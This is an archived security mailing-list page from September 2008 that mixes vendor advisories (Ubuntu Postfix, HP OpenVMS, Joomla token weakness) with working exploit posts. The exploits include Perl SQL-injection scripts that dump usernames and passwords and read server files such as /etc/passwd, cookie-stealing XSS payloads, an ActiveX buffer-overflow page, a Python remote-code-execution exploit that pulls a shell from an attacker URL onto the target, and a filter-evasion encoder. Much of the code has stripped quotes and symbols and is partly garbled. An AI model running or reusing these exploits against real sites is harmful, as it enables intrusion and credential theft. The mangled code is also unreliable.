[USN-642-1] Postfix vulnerabilities

2008-09-11 Thread Kees Cook
=== 
Ubuntu Security Notice USN-642-1 September 10, 2008
postfix vulnerabilities
CVE-2008-3889
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  postfix 2.4.5-3ubuntu1.3

Ubuntu 8.04 LTS:
  postfix 2.5.1-2ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Wietse Venema discovered that Postfix leaked internal file descriptors
when executing non-Postfix commands.  A local attacker could exploit
this to cause Postfix to run out of descriptors, leading to a denial
of service.


Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3.diff.gz
  Size/MD5:   208955 3596c996c2d82fcc9cd755c337cbac6b

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3.dsc
  Size/MD5: 1034 7097cb52b993eb39e3572516e37fa2fa

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5.orig.tar.gz
  Size/MD5:  2934634 ceba0cde05d12baa0ba2ed69fbb96b42

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-dev_2.4.5-3ubuntu1.3_all.deb
  Size/MD5:   131564 d817f30dac7e3cefa7207c9545484234

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-doc_2.4.5-3ubuntu1.3_all.deb
  Size/MD5:   805972 f21663666d6a5a9d4fc82842a22f72ab

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:38160 2b8a37d554c58a28e23d10d86df219a9

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-ldap_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:45310 900f1c0404391ecf79c1275175ef643d

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-mysql_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:40108 a1a6ffbfb86958511d610025e0a73d58

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pcre_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:40160 a8775f56b0b51d99565ccbe731dc5e94

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pgsql_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:40224 b989f80156a941d822b1e7d19477e08a

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:  1188180 9850d0763881c36da658d051fd43bcc5

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:37940 5cfcf1cf801d60e309428d6770e31e48

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-ldap_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:44644 0911f3527974816a8101e579ed439e7b

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-mysql_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:39790 10b6ae3688a3b74e208ba383973bd3a8

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pcre_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:39634 df5c552d2f10bfcdff5e9e38b2ce946a

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pgsql_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:39876 938516395dfcadfb33c7becb673cc157

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:  1118910 8479b2542dd638e9bc78ee318ba320a2

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:37918 c792b13b095b27f4c44f00b6ae7c5d4b

http://ports.ubuntu.com/pool/main/p/postfix/postfix-ldap_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:44384 83e6e216238d4d3d6f4e1855767f3d40

http://ports.ubuntu.com/pool/main/p/postfix/postfix-mysql_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:39810 0a917ce72b8bc23490af6d2374ebfd84

http://ports.ubuntu.com/pool/main/p/postfix/postfix-pcre_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:39534 5c3c470f3609e053d212b96961bad854

http://ports.ubuntu.com/pool/main/p/postfix/postfix-pgsql_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:39872 f8a381828c5e4e8056aad583282b2e70

http://ports.ubuntu.com/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:  1109740 56a17d3a010a3e2ea1be39e9ffb9ae3a

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_powerpc.deb
  Size/MD5:40328 7574b4b3c594be170675c25b25cf7ddd


Ezphotogallery 2.1 Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)

2008-09-11 Thread irancrash
#!/usr/bin/perl
#
#
#Script : Ezphotogallery 2.1
#
#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File 
Disclosure)
#
#Method : GET
#
#Alert : High
#
#Google Dork : 100% | 50% | 25% Back to gallery inurl:show.php?imageid=
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download :  
http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#
#Xss Vulnerabilities :
#
#Xss 1 : gallery.php?galleryid=scriptalert(document.cookie)/script
#Xss 2 : 
show.php?imageid=156size=''?''scriptalert(document.cookie)/script
#Xss 3 : show.php?imageid=scriptalert(document.cookie)/script
#
#
#Login Bypass :
#
#Insert in gallery.php
#
#User : admin ' or ' 1=1
#Password : Dr.Crash
#
#
#Sql Injection :
#
#Injection 1 : show.php?imageid=sql
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#

use LWP;
use HTTP::Request;
use Getopt::Long;
 
 
$scriptname=Ezphotogallery 2.1;

sub header
{
print 

* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
 
sub usage
{
  print 
* Usage : perl $0 http://Example/

;
}   
   
 

$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul = 
/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*;
$requestpage = $url.$vul;

 
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
 
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];

if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
print \n Username: .$name.\n\n;
print  Password:  .$password.\n\n;

 
}
 

#XPL2

sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;

$vul = 
/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*;
$requestpage = $url.$vul;
 
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();

 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];


if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print  File Save In source.txt\n;
print ;
 
}

#XPL2 END
#Starting;
print 

* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *

* Mod Options :*
* Mod 1 : 

sqlvdir.dll ActiveX Remote Buffer Overflow Exploit

2008-09-11 Thread beenudel1986
#  est.2007\/\/   forum.darkc0de.com   # 
 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al# 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE# 
#   and all darkc0de members---# 
 
# 
# Author: Beenu Arora 
# 
# Home  : www.BeenuArora.com 
# 
# Email : [EMAIL PROTECTED] 
# 
# Share the c0de! 
# 
 
# 
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit 
# 
# Successfull exploitation crashes the Browser 
# 
# Tested On : WinXp Sp-2 IE 6.0 
# 
# 
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll 
# Class SQLVDirControl 
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038} 
# Number of Interfaces: 1 
# Default Interface: ISQLVDirControl 
# RegKey Safe for Script: False 
# RegkeySafe for Init: False 
# KillBitSet: False 
# 
 
 
html 
Test Exploit page 
object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' 
/object 
script language='vbscript' 
targetFile = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll 
prototype  = Sub Connect ( [ ByVal szServer As Variant ] ,  [ ByVal szWebSite 
As Variant ] ) 
memberName = Connect 
progid = SQLVDIRLib.SQLVDirControl 
argCount   = 2 
arg1=defaultV 
arg2=http://[EMAIL PROTECTED] 
st\tes\t\:#$%test\test\test\te?s\test\test\tes\\:[EMAIL PROTECTED] 
\test\tes\test\test\tes\t\:#$%test\test\test\te?s\test\test\tes\\:[EMAIL
 PROTECTED] 
t\te.s\ttest\test\test\tes\test\test\tes\t\:#$%test\test\test\te?s\test\test\tes\\:[EMAIL
 PROTECTED] 
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\ 
 
target.Connect arg1 ,arg2 
 
/script 


PhsBlog v0.2 Bypass Sql injection Filtering Exploit

2008-09-11 Thread irancrash
#!/usr/bin/perl
#
#
#Script : PhsBlog v0.2
#
#Type : Bypass Sql injection Filtering Exploit
#
#Method : GET
#
#Risk : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download :  http://www.phsdev.com/downloads/phsblog_current.zip
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#

use LWP;
use HTTP::Request;
use Getopt::Long;
 
 
$scriptname=PhsBlog v0.2;

sub header
{
print 

* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
 
sub usage
{
  print 
* Usage : perl $0 http://Example/

;
}   
   
 

$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul = 
/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*;
$requestpage = $url.$vul;

 
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
 
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];

if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
print \n Username: .$name.\n\n;
print  Password:  .$password.\n\n;

 
}
 

#XPL2

sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;
#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/*
$vul = 
?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*;
$requestpage = $url.$vul;
 
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);

$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();

 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];


if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print  File Save In source.txt\n;
print ;
 
}

#XPL2 END
#Starting;
print 

* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *

* Mod Options :*
* Mod 1 : Find Script username and password*
* Mod 2 : File Disclosure(not work in many servers)*
;
print \n \n Enter Mod : ;
$mod=stdin;
if ($mod==1 or $mod==2) { print \n Exploiting .. \n; } else { 
print \n Unknown Mod ! \n Exploit Failed !; };
if ($mod==1) { xpl1(); };
if ($mod==2) { xpl2(); };


minb Remote Code Execution Exploit

2008-09-11 Thread r3d . w0rm
#!/usr/bin/python

#

 minb Remote Code Execution Exploit 
 

#

#   
#

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#

#

#   
#

#Site : http://minb.sf.net  
#

#   
#

#Download : 
http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2#

#   
#

#DORK : Powered by minb 
#

#   
#

#

# [Note]
#

#   
#

#All php file in this cms have this bug ;)  
#

#   
#

#

# Site : Http://IRCRASH.COM 
#

## TNX GOD 
##

import sys,urllib

if len(sys.argv)3 :

print minb Remote code Execution Exploit

print Powered by : R3d.W0rm

print www.IrCrash.com

print Usage :  + sys.argv[0] +  http://Target/path http://evil/shell.txt;

print Ex.  + sys.argv[0] +  http://site.com/minb http://r3d.a20.ir/r.txt;

exit()

if 'http://' not in sys.argv[1] :

sys.argv[1]='http://' + sys.argv[1]

if 'http://' not in sys.argv[2] :

sys.argv[2]='http://' + sys.argv[2]

fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'

data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=;$s=fopen(\'' + 
sys.argv[2] + 
'\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})

urllib.urlopen(sys.argv[1] + fp,data)

urllib.urlopen(sys.argv[1] + fp)

test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()

if 'Not Found' not in test :

print Shell Uploaded .

print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'

exit()



[security bulletin] HPSBOV02364 SSRT080078 rev.1 - HP OpenVMS SMGRTL Run Time Library, Local Authorized User, Gain Privileged Access

2008-09-11 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01539423
Version: 1

HPSBOV02364 SSRT080078 rev.1 - HP OpenVMS SMGRTL Run Time Library, Local 
Authorized User, Gain Privileged Access

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2008-09-10
Last Updated: 2008-09-10

Potential Security Impact: Local authorized user, gain privileged access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenVMS SMGRTL 
Run Time Library. The vulnerability could be exploited locally by an authorized 
user to gain extended privileges. 

References: CVE-2008-3540

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
The SMGRTL Run Time Library provided with the following HP OpenVMS versions:

HP OpenVMS for Integrity Servers v 8.3-1H1 
HP OpenVMS for Integrity Servers v 8.3 
HP OpenVMS for Integrity Servers v 8.2-1 
HP OpenVMS ALPHA v 8.3 
HP OpenVMS ALPHA v 8.2 
HP OpenVMS ALPHA v 7.3-2 



BACKGROUND

CVSS 2.0 Base Metrics 
===
Reference Base Vector   Base Score 
CVE-2008-3540 (AV:L/AC:L/Au:S/C:P/I:P/A:P)  4.3
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

The Hewlett-Packard Company thanks [EMAIL PROTECTED] for reporting this 
vulnerability to [EMAIL PROTECTED]

RESOLUTION

HP is providing the following early release patches publicly for use by any 
customer until updates are available in mainstream release patch kits. 

HP OpenVMS for Integrity Servers v 8.3-1H1 ECO VMS831H1I_MUP-SMGRTL-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3-1H1/VMS831H1I_SMGRTL_MUP-V0100.ZIPEXE
 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3-1H1/VMS831H1I_SMGRTL_MUP-V0100.txt
 
 


HP OpenVMS for Integrity Servers v 8.3 ECO VMS83I_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.ZIPEXE 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS for Integrity Servers v 8.2-1 ECO VMS821I_SMGRTL_MUP-V0100 
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.2-1/VMS821I_SMGRTL_MUP-V0100.ZIPEXE
 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.2-1/VMS821I_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS for Integrity Servers v 8.3 ECO VMS83I_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.ZIPEXE 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS ALPHA v 8.3 ECO VMS83A_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.3/VMS83A_SMGRTL_MUP-V0100.ZIPEXE 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.3/VMS83A_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS ALPHA v 8.2 ECO VMS82A_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.2/VMS82A_SMGRTL_MUP-V0100.ZIPEXE 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.2/VMS82A_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS ALPHA v 7.3-2 ECO VMS732_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V7.3-2/VMS732_SMGRTL_MUP-V0100.ZIPEXE
 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V7.3-2/VMS732_SMGRTL_MUP-V0100.txt 
 


PRODUCT SPECIFIC INFORMATION 
None

HISTORY 
Version:1 (rev.1) - 10 September 2008 Initial release 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 

Nooms 1.1

2008-09-11 Thread irancrash


Script : Nooms 1.1

Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute 
Force Local Access)

Risk : Medium



Download From : 
http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip



Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com



Mysql Remote Brute Force Vulnerability :


This is new type of the vulnerabilities .

I can't public Exploit of this vulnerability ,
But with this vulnerability attacker can brute force root and other user 
password with php in remote mode .

Mysql Brute Force Vulnerability : 
/db.php?g_dbhost=localhostg_dbuser=[username]g_dbpwd=[password]



Cross Site Scripting Vulnerabilities :

Xss 1 : http://Example/smileys.php?page_id=scriptalert('xss')/script

Xss 2 : http://Example/search.php?q=;scriptalert('xss')/script



Redirect Vulnerability :

Xss 1 : http://Example/admin/auth.php?g_site_url=[URL]



Tnx : God

  HTTP://IRCRASH.COM HTTP://FEREIDANI.IR




Advisory 04/2008: Joomla Weak Random Password Reset Token Vulnerability

2008-09-11 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


  SektionEins GmbH
 www.sektioneins.de

  -= Security  Advisory =-


 Advisory: Joomla Weak Random Password Reset Token Vulnerability
 Release Date: 2008/09/11
Last Modified: 2008/09/11
   Author: Stefan Esser [stefan.esser[at]sektioneins.de]

  Application: Joomla = 1.5.7
 Severity: Usage of mt_rand() and mt_srand() for generation
   of cryptographic secrets like random password 
   reset tokens
 Risk: High
Vendor Status: Vendor has released a partially fixed Joomla 1.5.7
Reference: http://www.sektioneins.de/advisories/SE-2008-04.txt
   
http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/


Overview:

   Quote from http://www.joomla.org
   Joomla is an award-winning content management system (CMS), which 
enables you to build Web sites and powerful online applications. 
Many aspects, including its ease-of-use and extensibility, have 
made Joomla the most popular Web site software available.

   During an analysis of the password reset vulnerability fixed in
   Joomla 1.5.6 we realized that Joomla does not only generate random
   password reset tokens with mt_rand(), which is not secure enough 
   for cryptographic secrets anyway, but additionally initializes the
   PRNG with a weak seed that results in less than 1.000.000 possible
   password reset tokens.

   Because there are only 1.000.000 possible password reset tokens an
   attacker can trigger a reset of the admin password and then try out
   all possible password reset tokens until he finds the correct one.
   Even with a home DSL line (as used in germany) breaking into the
   admin account should be possible in less than 3 hours. However
   attackers are usually bouncing over much faster hosts.

   In response to our report Joomla 1.5.7 was released (without sharing
   the patch with us prior the release) which replaces the very weak PRNG 
   seeding with a new seed that is about 2^32 in strength. While this 
   stops the simple brute forcing attack Joomla's password reset token 
   is still vulnerable to mt_rand() leak attacks and because Joomla still
   seeds the PRNG with mt_srand() it is a potential threat to other PHP 
   applications or plugins using mt_rand() on the same server.


Details:

   The problems arising from using mt_(s)rand for cryptographic secrets
   and possible attacks against PHP's PRNG and PHP applications using it
   are explained by the blog post mt_(s)rand and not so random numbers 
   which is available here:

   http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/


Proof of Concept:

   SektionEins GmbH is not going to release a proof of concept 
   exploit for this vulnerability.


Disclosure Timeline:

   15. Aug 2008 - Sent notification to Joomla about the vulnerability
   20. Aug 2008 - Resent notification because no reply from Joomla
   20. Aug 2008 - Received confirmation
   21. Aug 2008 - Received a forwarded message from vendor-sec discussing
  the vulnerability - obviously Joomla shared our report
  with vendor-sec without asking or notifying us.
   21. Aug 2008 - In a reply to the forwarded message we recommended NOT
  TO USE mt_srand for the password reset
   03. Sep 2008 - On Joomla.org appears a blog post notifying their users
  that they should upgrade to Joomla 1.5.6 immediately
  because of security issues with the password reset
   09. Sep 2008 - The Joomla Development Team releases Joomla 1.5.7
  without telling us about this or consulting us to review
  their patch
   11. Sep 2008 - Public Disclosure after learning about the new
  Joomla 1.5.7 in the media


Recommendation:

   It is recommended to upgrade not only to the latest version of Joomla
   which also fixes additional vulnerabilities reported by third parties,
   but also to install the Suhosin PHP extension, which comes with a
   generic protection against mt_(s)rnad vulnerabilities.

   Upgrading only Joomla does not fix the whole problem.
   
   Grab your copies at:
   
   http://www.joomla.org
   http://www.suhosin.org


CVE Information:

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   not assigned a name to this vulnerability yet.


GPG-Key:

   pub  1024D/15ABDA78 2004-10-17 Stefan Esser [EMAIL PROTECTED]
   Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C  57DD 4AE1 795E 15AB DA78


Copyright 2008 SektionEins GmbH. All rights reserved.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkjJLHkACgkQSuF5XhWr2njUYQCgq+5P1O+7llh32KXcCHqdQ/C4
QWoAoJGF6jt3rDyNM3ESDlfUA/NxW3f9
=AA3y
-END PGP SIGNATURE-



RE: SQL Smuggling

2008-09-11 Thread Gary Oleary-Steele
Hi,

First let me start by saying im not writing to flame anyone (or whatever you 
kids say these days). I know its can be a daunting to release a paper to the 
security community because if any of its incorrect you're gonna hear about it.

However releasing a paper and claiming it to be a new class (or sub-class) of 
vulnerability, well im sorry, its like wearing Gold football boots, you better 
get it right after a statement like that.

If this paper was titled Bypassing Broken Input Validation Filters then there 
would be no problems. However none of what exists in this document is new, in 
fact most of it is in the Web Application Hackers Handbook or in much older 
papers. Constructing attackers of all kinds to bypass black list filters is a 
common duty of the web application tester, also take a look at all of the 
recent SQL injection worms.

The main thing wrong here is claiming it to be something new, or even claiming 
it to be a sub-class,  it not!

Its several methods for encoding sql queries or tricking multi layered input 
validation/sanitisation routines, none of which are new, all of which are 
implemented by every pen/app tester i have ever worked with.

It could be a useful reference but i would rename it and drop the new class 
claims.

Regards
Gary

P.S. You mention the unicode trick but dont provide any code or exploit 
examples. Here is a ruby script to perform the encoding when attacking a bug 
via IIS (others may also work).


# Ruby Script to generate URL encoded Unicode UTF-8 URL.
# Author: Gary O'leary-Steele of Sec-1 Ltd
# Example:
# The string ' or 1 in (@@version)-- is encoded as and work for the same SQL 
injection attack
# 
%u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d
#
#

require 'uri'
def unicode_url(string)
  lookuptable = Hash.new
  lookuptable ={
' ' = '%u0020',
'/' = '%u2215',
'\\' = '%u2215',
' = '%u02b9',
'' = '%u0022',
'' = '%u003e',
'' = '%u003c',
'#' = '%uff03',
'!' = '%uff01',
'$' = '%uff04',
'*' = '%uff0a',
'@' = '%u0040',
'.' = '%uff0e',
'_' = '%uff3f',
'(' = '%uff08',
')' = '%uff09',
',' = '%uff0c',
'%' = '%u0025',
'-' = '%uff0d',
';' = '%uff1b',
':' = '%uff1a',
'|' = '%uff5c',
'' = '%uff06',
'+' = '%uff0b',
